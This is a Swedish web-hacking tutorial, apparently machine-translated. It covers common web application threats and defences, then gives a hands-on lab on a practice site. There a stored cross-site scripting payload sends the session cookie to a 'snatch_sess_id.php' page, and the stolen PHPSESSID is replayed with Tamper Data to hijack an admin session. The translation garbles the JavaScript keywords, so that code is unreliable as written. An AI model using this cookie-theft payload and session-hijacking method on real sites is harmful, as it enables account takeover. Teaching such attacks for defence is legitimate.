fler människor har tillgång till internet än någonsin tidigare. Detta har fått många organisationer att utveckla webbaserade applikationer som användare kan använda online för att interagera med organisationen. Dåligt skriven kod för webbapplikationer kan utnyttjas för att få obehörig åtkomst till känslig data och webbservrar.

i den här handledningen lär du dig att hacka webbplatser, och vi kommer att introducera dig till webbapplikationhackningstekniker och de motåtgärder du kan vidta för att skydda mot sådana attacker.

ämnen som behandlas i denna handledning

• Vad är en webbapplikation? Vad är webbhot?
• Hur skyddar du din webbplats mot hackar?
• webbplats hacking tricks: hacka en webbplats på nätet!

Vad är en webbapplikation? Vad är webbhot?

en webbapplikation (aka webbplats) är en applikation baserad på klient-servermodellen. Servern tillhandahåller databasåtkomst och affärslogik. Det är värd på en webbserver. Klientapplikationen körs på klientens webbläsare. Webbapplikationer skrivs vanligtvis på språk som Java, C# och VB.Net, PHP, ColdFusion Markup Language, etc. databasmotorerna som används i webbapplikationer inkluderar MySQL, MS SQL Server, PostgreSQL, SQLite, etc.

de flesta webbapplikationer är värd på offentliga servrar som är tillgängliga via Internet. Detta gör dem sårbara för attacker på grund av enkel tillgänglighet. Följande är vanliga hot mot webbapplikationer.

• SQL Injection – målet med detta hot kan vara att kringgå inloggningsalgoritmer, sabotera data etc.
• Denial of Service Attacks-målet med detta hot kan vara att neka legitima användare tillgång till resursen
• Cross Site Scripting XSS– målet med detta hot kan vara att injicera kod som kan köras på klientsidan webbläsaren.
• Cookie / Session förgiftning-målet med detta hot är att ändra cookies/sessionsdata av en angripare för att få obehörig åtkomst.
• Form manipulering-målet med detta hot är att ändra formulärdata såsom priser i e-handelsapplikationer så att angriparen kan få objekt till reducerade priser.
• Code Injection-målet med detta hot är att injicera kod som PHP, Python, etc. det kan köras på servern. Koden kan installera bakdörrar, avslöja känslig information etc.
• Defacement-målet med detta hot är att ändra sidan som visas på en webbplats och omdirigera alla sidförfrågningar till en enda sida som innehåller angriparens meddelande.

Hur skyddar du din webbplats mot Hack?

en organisation kan anta följande policy för att skydda sig mot webbserverattacker.

• SQL Injection– sanering och validering av användarparametrar innan de skickas in i databasen för bearbetning kan bidra till att minska risken för attackerats via SQL-injektion. Databasmotorer som MS SQL Server, MySQL, etc. stödparametrar och förberedda uttalanden. De är mycket säkrare än traditionella SQL – satser
• Denial of Service-attacker-brandväggar kan användas för att släppa trafik från misstänkt IP-adress om attacken är en enkel DoS. Korrekt konfiguration av nätverk och intrångsdetekteringssystem kan också bidra till att minska risken för en DoS-attack varit framgångsrik.
• Cross Site Scripting-validera och sanera rubriker, parametrar skickas via URL, formulärparametrar och dolda värden kan bidra till att minska XSS attacker.
• Cookie / Session förgiftning-detta kan förhindras genom att kryptera innehållet i cookies, timing ut cookies efter en tid, associera cookies med kundens IP-adress som användes för att skapa dem.
• Formhärdning-detta kan förhindras genom att validera och verifiera användarinmatningen innan den bearbetas.
• Kodinjektion-detta kan förhindras genom att behandla alla parametrar som data snarare än körbar kod. Sanering och validering kan användas för att genomföra detta.
• Defacement – en bra säkerhetspolicy för webbapplikationsutveckling bör säkerställa att den förseglar de vanliga sårbarheterna för att komma åt webbservern. Detta kan vara en korrekt konfiguration av operativsystemet, webbserverprogramvaran och bästa säkerhetspraxis när man utvecklar webbapplikationer.

webbplats hacking tricks: hacka en webbplats på nätet

i denna webbplats hacking praktiskt scenario, vi kommer att kapa användarsessionen för webbapplikationen ligger på www.techpanda.org. Vi kommer att använda cross site scripting för att läsa cookie-sessions-id och sedan använda det för att efterlikna en legitim användarsession.

antagandet är att angriparen har tillgång till webbapplikationen och han vill kapa sessionerna för andra användare som använder samma applikation. Målet med denna attack kan vara att få adminåtkomst till webbapplikationen förutsatt att angriparens åtkomstkonto är begränsat.

komma igång

• öppnahttp://www.techpanda.org/
• för övningsändamål rekommenderas det starkt att få åtkomst med SQL-injektion. Se den här artikeln för mer information om hur du gör det.
• inloggningsmeddelandet är den här e-postadressen är skyddad från spamrobotar. Du måste tillåta JavaScript för att visa den., lösenordet är Password2010
• Om du har loggat in framgångsrikt får du följande instrumentpanel

• Klicka på Lägg till ny kontakt
• ange följande som förnamn

<a href=# onclick=\”dokument.plats=\ ’http://techpanda.org/snatch_sess_id.php?c=\’+escape\(dokument.cookie\)\;\”>mörk</a>

Här,

ovanstående kod använder JavaScript. Det lägger till en hyperlänk med en onclick-händelse. När den intet ont anande användaren klickar på länken hämtar händelsen PHP-cookiesessions-ID och skickar det till snatch_sess_id.php-sida tillsammans med sessions-id i URL

• ange de återstående detaljerna som visas nedan
• Klicka på Spara ändringar

• din instrumentpanel kommer nu att se ut som följande skärm

• eftersom skriptkoden för cross site lagras i databasen laddas den varje gång användare med åtkomsträttigheter logga in
• låt oss anta att administratören loggar in och klickar på hyperlänken som säger mörk
• han/hon kommer att få fönstret med sessions-id som visas i URL

Obs: skriptet kan skicka värdet till vissa användare fjärrserver där phpsessid lagras sedan omdirigeras användaren tillbaka till webbplatsen som om ingenting hände.

Obs: värdet du får kan skilja sig från det i denna webbsida hacking handledning, men konceptet är samma

Session Impersonation med Firefox och Tamper Data add-on

flödesschemat nedan visar de steg som du måste vidta för att slutföra denna övning.

• du behöver Firefox webbläsare för detta avsnitt och Tamper Data add-on
• öppna Firefox och installera tillägget som visas i diagrammen nedan

• Sök efter manipuleringsdata och klicka sedan på Installera som visas ovan

• klicka på Acceptera och installera…

• Klicka på Starta om nu när installationen är klar
• aktivera menyraden i Firefox om den inte visas

• du får följande fönster. Obs: Om Windows inte är tom, tryck på Rensa knappen

• Klicka på Start Manipuleringsmenyn
• växla tillbaka till Firefox webbläsare, typ http://www.techpanda.org/instrumentpanel.php tryck sedan på enter för att ladda sidan
• Du kommer att få följande popup från Manipuleringsdata

• popup-fönstret har tre (3) alternativ. Med Tamper-alternativet kan du ändra HTTP-rubrikinformationen innan den skickas till servern.
• Klicka på den
• du får följande fönster

• kopiera PHP-sessions-ID du kopierade från attack-URL: en och klistra in den efter likhetstecknet. Ditt värde ska nu se ut så här

PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2

• Klicka på OK-knappen
• du får popup-fönstret för Manipuleringsdata igen

• avmarkera kryssrutan som frågar fortsätt manipulering?
• Klicka på Skicka knappen när du är klar
• Du bör kunna se instrumentpanelen som visas nedan

Obs: vi loggade inte in, vi imiterade en inloggningssession med PHPSESSID-värdet som vi hämtade med hjälp av cross site scripting

sammanfattning

• en webbapplikation är baserad på serverklientmodellen. Klientsidan använder webbläsaren för att komma åt resurserna på servern.
• webbapplikationer är vanligtvis tillgängliga via internet. Detta gör dem sårbara för attacker.
• webbapplikationshot inkluderar SQL-injektion, Kodinjektion, XSS, Defacement, Kakförgiftning etc.
• en bra säkerhetspolicy när du utvecklar webbapplikationer kan hjälpa till att göra dem säkra.